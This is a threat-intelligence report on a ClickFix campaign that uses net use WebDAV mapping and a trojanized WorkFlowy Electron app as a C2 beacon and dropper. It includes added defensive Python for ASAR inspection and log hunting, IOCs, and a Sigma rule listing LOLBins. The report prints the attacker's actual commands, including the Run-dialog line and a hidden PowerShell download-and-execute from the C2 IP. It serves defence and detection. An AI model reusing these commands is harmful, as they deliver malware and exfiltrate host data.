
Investigating a New Click-Fix Variant

The Hacker News · Archived Mar 16, 2026




The Hacker News, Mar 13, 2026 · Malware / Threat Hunting

Disclaimer: This report has been prepared by the Threat Research Center to enhance cybersecurity awareness and support the strengthening of defense capabilities. It is based on independent research and observations of the current threat landscape available at the time of publication. The content is intended for informational and preparedness purposes only. Read more blogs around threat intelligence and adversary research: https://atos.net/en/lp/cybershield

Summary

Atos researchers identified a new variant of the popular ClickFix technique, in which attackers convince the user to execute a malicious command on their own device through the Win + R shortcut. In this variation, a "net use" command is used to map a network drive from an external server, after which a ".cmd" batch file hosted on that drive is executed. The script downloads a ZIP archive, unpacks it, and executes the legitimate WorkFlowy application with modified, malicious logic hidden inside its ".asar" archive. This acts as a C2 beacon and a dropper for the final malware payload.

[Figure 1: High-level overview of attack flow.]

Attack overview

In this version, the initial attack vector is the same as in all the other ones: a web page posing as a captcha mechanism, "happyglamper[.]ro". It prompts the user to open the Run dialog via "Win+R", followed by "Ctrl+V" and "Enter".

[Figure 2: Phishing website 1]
[Figure 3: Phishing website 2]

This executes the following command:

    "cmd.exe" /c net use Z: https://94.156.170[.]255/webdav /persistent:no && "Z:\update.cmd" & net use Z: /delete

Typically, at this stage, attackers have used PowerShell or mshta to download and execute the next stage of the malware. Here, instead, we can see that "net use" is being used to map and connect to a network drive on an external server, from which a batch script is executed.
While not novel, these TTPs had never been seen in ClickFix attacks before. Combined with the uncommon later stages of the infection chain, this campaign gives adversaries a high chance of evading defensive controls and staying under the radar of defenders. In this case, the observed ClickFix variant of the execution flow successfully bypassed detection by Microsoft Defender for Endpoint. Atos security teams were able to detect it only thanks to the internal Threat Hunting service focusing on the main behavioral aspect of the ClickFix technique: initial execution through the RunMRU registry key (hunting query available in the Appendix section).

The initial execution script "update.cmd" is loaded from the mapped drive and executed; after that, the mapped drive is removed. Content of "update.cmd":

    start "" /min powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'https://94.156.170[.]255/flowy.zip' -OutFile \"$env:TEMP\dl.zip\"; Expand-Archive \"$env:TEMP\dl.zip\" -DestinationPath \"$env:LOCALAPPDATA\MyApp\" -Force; Start-Process \"$env:LOCALAPPDATA\MyApp\WorkFlowy.exe\""

This spawns a PowerShell instance which downloads a ZIP archive and extracts it into the "%LOCALAPPDATA%\MyApp\" directory. It then executes the "WorkFlowy.exe" binary.

[Figure 4: Content of flowy.zip archive]

WorkFlowy analysis

The archive contains a WorkFlowy desktop application (version 1.4.1050), signed by the developer "FunRoutine Inc." and distributed as an Electron application bundle. Electron applications are written using popular web technologies (HTML, CSS and JavaScript) and use ".asar" archives to pack the source code when the application is packaged. This is done for various reasons, such as mitigating issues around long path names on Windows. The malicious code was injected into main.js, the Node.js entry point of the app, hidden inside the app.asar archive.
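Because app.asar is just a header plus concatenated file bytes, a responder can inventory it and hash its entries without running the application. The following is an added example of mine, not code from the report or from the WorkFlowy project: a minimal ASAR reader that lists every packed file with its SHA256 and compares main.js against a trusted build. It assumes the public @electron/asar layout (an 8-byte size prefix, a Chromium-Pickle-encoded JSON header, then raw file data at offset 8 + header size); build_asar() exists only to construct an offline fixture, and the file contents and the "known good" hash table are constructed for the example.

```python
"""Added example: read an Electron ASAR archive and flag entries whose hash differs
from a trusted build. Not part of the original report; fixture data is constructed."""
import hashlib
import json
import struct
from typing import Iterator


def _pickle_string(data: bytes) -> bytes:
    """Chromium Pickle string: u32 LE length, the bytes, zero padding to a 4-byte boundary."""
    return struct.pack("<I", len(data)) + data + b"\0" * ((-len(data)) % 4)


def build_asar(files: dict[str, bytes]) -> bytes:
    """Construct a minimal ASAR in memory (test fixture only; real archives come from
    @electron/asar). Keys are '/'-separated paths inside the archive."""
    tree: dict = {"files": {}}
    data = bytearray()
    for path, content in files.items():
        parts = path.split("/")
        node = tree
        for part in parts[:-1]:
            node = node["files"].setdefault(part, {"files": {}})
        node["files"][parts[-1]] = {"size": len(content), "offset": str(len(data))}
        data += content
    payload = _pickle_string(json.dumps(tree).encode())
    header = struct.pack("<I", len(payload)) + payload      # inner pickle: payload size + string
    return struct.pack("<II", 4, len(header)) + header + bytes(data)


def parse_asar(blob: bytes) -> tuple[dict, int]:
    """Return (header JSON, byte offset where file data begins)."""
    marker, header_size = struct.unpack_from("<II", blob, 0)
    if marker != 4:
        raise ValueError("not an ASAR archive: first pickle should hold a single u32")
    payload_size, json_len = struct.unpack_from("<II", blob, 8)
    if payload_size != header_size - 4 or 16 + json_len > 8 + header_size:
        raise ValueError("inconsistent ASAR header sizes")
    header = json.loads(blob[16:16 + json_len])
    return header, 8 + header_size


def walk(tree: dict, prefix: str = "") -> Iterator[tuple[str, dict]]:
    """Yield (path, entry) for every file node, recursing into directory nodes."""
    for name, node in tree.get("files", {}).items():
        path = f"{prefix}/{name}"
        if "files" in node:
            yield from walk(node, path)
        else:
            yield path, node


def inventory(blob: bytes) -> dict[str, tuple[int, str]]:
    """Map each packed path to (size, sha256). Entries marked 'unpacked' live next to the
    archive in app.asar.unpacked and are skipped here."""
    header, data_start = parse_asar(blob)
    out: dict[str, tuple[int, str]] = {}
    for path, node in walk(header):
        if node.get("unpacked"):
            continue
        start = data_start + int(node["offset"])
        chunk = blob[start:start + node["size"]]
        if len(chunk) != node["size"]:
            raise ValueError(f"{path}: entry points past the end of the archive")
        out[path] = (node["size"], hashlib.sha256(chunk).hexdigest())
    return out


def find_tampered(blob: bytes, known_good: dict[str, str]) -> list[str]:
    """Paths whose hash differs from the trusted build, or that the trusted build lacks."""
    return sorted(p for p, (_, digest) in inventory(blob).items() if known_good.get(p) != digest)


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Constructed fixture: a tiny "legitimate" main.js and a copy with a blocking IIFE prepended,
# standing in for the beacon-first structure the report describes.
LEGIT_MAIN_JS = b"const { app } = require('electron');\napp.whenReady().then(createWindow);\n"
PACKAGE_JSON = b'{"name":"sample-app","main":"main.js"}'
TROJANIZED_MAIN_JS = b"(async()=>{await f()})();\n" + LEGIT_MAIN_JS
KNOWN_GOOD = {"/main.js": sha256(LEGIT_MAIN_JS), "/package.json": sha256(PACKAGE_JSON)}


def demo() -> list[str]:
    """Inventory a trojanized fixture archive; returns ['/main.js']."""
    blob = build_asar({"main.js": TROJANIZED_MAIN_JS, "package.json": PACKAGE_JSON})
    return find_tampered(blob, KNOWN_GOOD)


if __name__ == "__main__":
    print("tampered entries:", demo())
```

On a real sample the blob comes from reading resources/app.asar, and the known-good table from hashing the same version's archive obtained from the vendor; the report's app.asar and main.js SHA256 values in the Appendix can be matched against the inventory output directly.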
Technical Profile

    Property             Value
    Target application   WorkFlowy Desktop (Electron)
    Malicious version    1.4.1050
    Malicious file       resources/app.asar -> /main.js
    C2 domain            cloudflare[.]report/forever/e/
    C2 origin IP         144[.]31[.]165[.]173 (Frankfurt, AS215439 play2go.cloud)
    Domain registered    January 2026, HK registrant, OnlineNIC registrar
    Victim ID file       %APPDATA%\id.txt
    Dropper staging dir  %TEMP%\[unix_timestamp]\

Infection Vector

The malicious ASAR archive is a direct replacement for the legitimate resources/app.asar. The attacker repackaged an older version of the app (v1.4 vs. the current v4.3) with injected code.

[Figure 5: Content of "resources" subdirectory]

Malicious Code (Dropper/Beacon)

When WorkFlowy is executed, it looks for the app.asar file at the relative path hardcoded into the binary. It then reads the main.js file from inside it, decodes it to a string, and passes it to the embedded V8 JavaScript engine, which executes it. The attackers replaced the legitimate main.js with one they created themselves. Instead of well-structured scripts, they used a heavily obfuscated one-liner structure, adding malicious code on top of the legitimate code so that it executes first and blocks WorkFlowy functionality. The malicious code contains several critical functions:

Malware executes before the legitimate application starts: The injected IIFE opens with await f(), the infinite C2 beacon loop. Because f() never resolves, all legitimate WorkFlowy initialization code that follows is permanently blocked. The malware runs with full Node.js privileges immediately on launch.

Persistent victim fingerprinting via %APPDATA%\id.txt: A random 8-character alphanumeric ID is generated on first run and written to %APPDATA%\id.txt. On subsequent runs, the stored ID is read back, giving the attacker a stable identifier for each victim machine across sessions.
C2 beacon, exfiltrating host identity every 2 seconds: Function u() sends an HTTP POST containing the victim's unique ID, machine name, and Windows username to the C2 server. The loop in f() repeats this indefinitely with a 2-second interval.

Remote payload download and execution: Function p() receives a task object from the C2, decodes base64-encoded file contents, writes them to a timestamped directory under %TEMP%, and executes any .exe via child_process.exec. If the C2 connection is not established, no files or directories are generated. At the time of this analysis, the C2 domain was already unresponsive.

Why Electron is an Effective Delivery Mechanism

The malicious code runs in the Node.js main process, outside the Chromium sandbox, with the full privileges of the logged-in user, allowing the malicious code to perform any action the user is allowed to perform on the system. No files are actually written to disk, and since the malicious payload is packed inside the ".asar" archive, this additionally helps to hide the malicious code.

Persistence

No OS-level persistence is implemented by the dropper. The beacon runs only while WorkFlowy is open. The only artifact written to disk before next-stage delivery is %APPDATA%\id.txt (the victim tracking ID), and only if the connection to the C2 is established correctly. Presumably, OS-level persistence is delegated to whatever payload the C2 delivers via the dropper.

Key takeaways

This ClickFix variant is significant because it moves initial access away from commonly abused scripting and execution engines such as PowerShell, MSHTA, and WScript, and instead relies on net use to abuse WebDAV as a delivery mechanism. Previous ClickFix campaigns typically exposed themselves by directly invoking interpreters or living-off-the-land binaries that are heavily monitored by modern EDR solutions.
In contrast, this iteration mounts a remote WebDAV share as a local drive, executes a hosted batch file through standard filesystem semantics, and removes the mapping immediately after use. This shows that ClickFix is still evolving, expanding its arsenal of proxy-execution methods and starting to use native networking utilities.

The malicious logic is hidden by replacing the content of the WorkFlowy application's app.asar archive with a trojanized version of main.js. Because the code runs inside the Electron main process and remains packaged within a legitimate application, it avoids many file-based and behavioral detections that focus on standalone loaders or script interpreters. ASAR archives are rarely inspected, allowing the dropper logic to execute through normal application startup with minimal visibility.

This activity was not detected by security controls and was only identified through targeted threat hunting at Atos. Detection relied on analyzing execution context rather than payload indicators, specifically hunting for suspicious command execution originating from the Explorer Run dialog (recorded in the RunMRU registry key). This underscores the growing importance of threat hunting as a complementary detection mechanism: as ClickFix campaigns shift toward native utilities and trusted applications that generate few alerts, only proactive, hypothesis-driven hunting can surface these weak signals early enough to disrupt the attack chain.
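The mount-execute-unmap pattern described above is visible in process command-line telemetry even when the interpreter itself is not monitored. The following is an added example of mine, not a detection from the report: it parses "net use" invocations out of a command line, separates WebDAV targets (http/https URLs and UNC paths carrying the WebClient "@SSL" or "@port" marker) from ordinary SMB shares, and flags a line that maps a WebDAV endpoint and, in the same command, executes from or deletes that mapping. The sample command lines are constructed; the first is the report's own Run-dialog command with its defanged IP left as printed.

```python
"""Added example: flag 'net use' command lines that map a WebDAV endpoint and execute
from or unmap it in the same command. Not part of the original report."""
import re

# net / net1 / net.exe, then "use", optional drive letter or '*', then the target token
NET_USE_RE = re.compile(
    r'\bnet(?:1)?(?:\.exe)?\s+use\s+(?:([A-Za-z]:|\*)\s+)?(\S+)', re.IGNORECASE)
# WebDAV targets: a URL, or a UNC path whose host carries @SSL or @<port> (WebClient syntax)
WEBDAV_TARGET_RE = re.compile(
    r'^(?:https?://|\\\\[^\\\s]+@(?:ssl|\d{1,5})\\)', re.IGNORECASE)
# A path executed via a drive letter, e.g. Z:\update.cmd (stops at whitespace, quotes, & and |)
DRIVE_PATH_RE = re.compile(r'\b([A-Za-z]):\\[^\s"&|]+')


def analyze_net_use(cmdline: str) -> dict:
    """Break a command line into the drives it maps/unmaps, the WebDAV targets it uses,
    and any paths it executes from a drive mapped in that same line."""
    webdav, mapped, unmapped = [], [], []
    for drive, target in NET_USE_RE.findall(cmdline):
        drive = drive.upper()
        if target.lower() == "/delete":
            unmapped.append(drive)
        else:
            mapped.append(drive)
            if WEBDAV_TARGET_RE.match(target):
                webdav.append(target)
    executed = [m.group(0) for m in DRIVE_PATH_RE.finditer(cmdline)
                if m.group(1).upper() + ":" in mapped]
    return {"webdav_targets": webdav, "mapped_drives": mapped,
            "unmapped_drives": unmapped, "exec_from_mapped": executed}


def is_suspicious(cmdline: str) -> bool:
    """A WebDAV mapping is only flagged when the same command line also runs something
    from that drive or tears the mapping down again; a plain persistent SharePoint
    WebDAV mapping (a common false positive) is left alone."""
    r = analyze_net_use(cmdline)
    return bool(r["webdav_targets"]) and bool(r["exec_from_mapped"] or r["unmapped_drives"])


# Constructed samples
CLICKFIX_CMDLINE = (r'"cmd.exe" /c net use Z: https://94.156.170[.]255/webdav /persistent:no'
                    r' && "Z:\update.cmd" & net use Z: /delete')
SMB_CMDLINE = r'net use H: \\fileserver\home /persistent:yes'
SHAREPOINT_CMDLINE = r'net use W: \\sharepoint.corp@SSL\DavWWWRoot\sites\it /persistent:no'


if __name__ == "__main__":
    for line in (CLICKFIX_CMDLINE, SMB_CMDLINE, SHAREPOINT_CMDLINE):
        print(is_suspicious(line), analyze_net_use(line))
```

In practice this runs over Sysmon Event ID 1 (or equivalent EDR) CommandLine fields; the WebDAV-only hit on the SharePoint line is the case to tune against, while the combination of a URL target, execution from the mapped letter and an immediate "/delete" in one command line has little legitimate use.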
Appendix

IOCs

    Domain   cloudflare[.]report
    Domain   happyglamper[.]ro
    IP       94[.]156[.]170[.]255
    IP       144[.]31[.]165[.]173
    URL      https://cloudflare[.]report/forever/e/
    File     %APPDATA%\id.txt
    Path     %TEMP%\[13-digit-timestamp]\
    SHA256   a390fe045f50a0697b14160132dfa124c7f92d85c18fba07df351c2fcfc11063 (app.asar)
    SHA256   9ee58eb59e337c06429ff3f0afd0ee6886b0644ddd4531305b269e97ad2b8d42 (WorkFlowy.exe; older version of the legitimate binary, not malicious)
    SHA256   dc95f7c7fb98ec30d3cb03963865a11d1b7b696e34f163b8de45f828b62ec829 (main.js)

Hunting Query

    title: Suspicious Commands executed via Run dialog
    id: 20891a30-032e-4f15-a282-fa4a8b0d8aae
    status: experimental
    description: Detects suspicious command interpreters and LOLBins written into the Explorer RunMRU registry key (commonly used for Run dialog history), with explorer.exe as the initiating process.
    author: TRC
    date: 2026-03-05
    tags:
        - attack.execution
        - attack.t1059
        - attack.defense_evasion
    logsource:
        category: registry_set
        product: windows
        definition: "Sysmon Event ID 13 (Registry value set) or equivalent EDR registry telemetry"
    detection:
        selection_key:
            TargetObject|contains: '\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'
        selection_proc:
            Image|endswith: '\explorer.exe'
        selection_data:
            Details|contains:
                - 'cmd '
                - 'powershell '
                - 'cmd.exe '
                - 'powershell.exe '
                - 'wscript.exe '
                - 'cscript.exe '
                - 'net.exe '
                - 'net1.exe '
                - 'sh.exe '
                - 'bash.exe '
                - 'schtasks.exe '
                - 'regsvr32.exe '
                - 'hh.exe '
                - 'wmic.exe '
                - 'mshta.exe '
                - 'rundll32.exe '
                - 'msiexec.exe '
                - 'forfiles.exe '
                - 'scriptrunner.exe '
                - 'mftrace.exe '
                - 'AppVLP.exe '
                - 'svchost.exe '
                - 'msbuild.exe '
        condition: selection_key and selection_proc and selection_data
    falsepositives:
        - "Legitimate administrative activity using Run dialog (Win+R) to execute built-in tools."
        - "IT scripts or troubleshooting steps executed interactively by a user."
    level: medium

Tags: Command Execution, cybersecurity, Malware, Phishing, Supply Chain Security, Threat Hunting, Threat Intelligence, WebDAV, windows security
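To show what the hunting query above actually evaluates, here is an added example of mine (not the report's code) that applies the same three selections to constructed Sysmon Event ID 13 records: TargetObject must contain the RunMRU key path, Image must end in \explorer.exe, and Details must contain one of the rule's tokens. Two details go beyond the rule as written and are assumptions of this example: Explorer stores each Run-dialog entry with a trailing "\1" suffix, which is stripped, and double quotes are removed before matching because a quoted interpreter path ("cmd.exe" /c ...) would otherwise never contain the token 'cmd.exe ' with its trailing space. Matching is case-insensitive, as Sigma's contains modifier is.

```python
"""Added example: the appendix RunMRU hunting logic applied to constructed Sysmon
Event ID 13 (registry value set) records. Not part of the original report."""

# selection_data from the rule, lower-cased once (Sigma 'contains' is case-insensitive)
RUN_DIALOG_TOKENS = [t.lower() for t in (
    'cmd ', 'powershell ', 'cmd.exe ', 'powershell.exe ', 'wscript.exe ', 'cscript.exe ',
    'net.exe ', 'net1.exe ', 'sh.exe ', 'bash.exe ', 'schtasks.exe ', 'regsvr32.exe ',
    'hh.exe ', 'wmic.exe ', 'mshta.exe ', 'rundll32.exe ', 'msiexec.exe ', 'forfiles.exe ',
    'scriptrunner.exe ', 'mftrace.exe ', 'AppVLP.exe ', 'svchost.exe ', 'msbuild.exe ')]

# selection_key, compared against a lower-cased TargetObject
RUNMRU_KEY = r'\software\microsoft\windows\currentversion\explorer\runmru'


def normalize_details(details: str) -> str:
    """Strip Explorer's trailing '\\1' MRU suffix and any double quotes (this example's
    assumption: a quoted path like "cmd.exe" /c ... should still match 'cmd.exe ')."""
    if details.endswith('\\1'):
        details = details[:-2]
    return details.replace('"', '').lower()


def matched_tokens(event: dict) -> list[str]:
    """Rule tokens present in the event's Details, or [] when selection_key or
    selection_proc does not hold."""
    if RUNMRU_KEY not in event.get('TargetObject', '').lower():
        return []
    if not event.get('Image', '').lower().endswith(r'\explorer.exe'):
        return []
    details = normalize_details(event.get('Details', ''))
    return [t for t in RUN_DIALOG_TOKENS if t in details]


def hunt(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Indices of the events the rule would flag, with the tokens that fired."""
    return [(i, toks) for i, ev in enumerate(events) if (toks := matched_tokens(ev))]


# Constructed records using Sysmon Event ID 13 field names
SAMPLE_EVENTS = [
    {   # the campaign's Run-dialog command (defanged IP kept as printed in the report)
        "Image": r"C:\Windows\explorer.exe",
        "TargetObject": r"HKU\S-1-5-21-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a",
        "Details": r'"cmd.exe" /c net use Z: https://94.156.170[.]255/webdav /persistent:no && "Z:\update.cmd" & net use Z: /delete\1',
    },
    {   # benign Run-dialog use
        "Image": r"C:\Windows\explorer.exe",
        "TargetObject": r"HKU\S-1-5-21-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\b",
        "Details": r"notepad\1",
    },
    {   # matching token, but the value was not written by explorer.exe (selection_proc fails)
        "Image": r"C:\Windows\System32\reg.exe",
        "TargetObject": r"HKU\S-1-5-21-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\c",
        "Details": r"powershell -Command Get-Date\1",
    },
    {   # the rule's documented false positive: an admin unregistering a DLL from Win+R
        "Image": r"C:\Windows\explorer.exe",
        "TargetObject": r"HKU\S-1-5-21-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\d",
        "Details": r"regsvr32.exe /u C:\Temp\old.dll\1",
    },
]


if __name__ == "__main__":
    for index, tokens in hunt(SAMPLE_EVENTS):
        print(index, tokens, SAMPLE_EVENTS[index]["Details"])
```

The fourth record fires as well, which is the medium-level rule's stated trade-off: Run-dialog history is a low-volume source, so the hits are reviewed by an analyst rather than auto-blocked, and the campaign command stands out from the administrative ones by its URL target and mapped-drive execution.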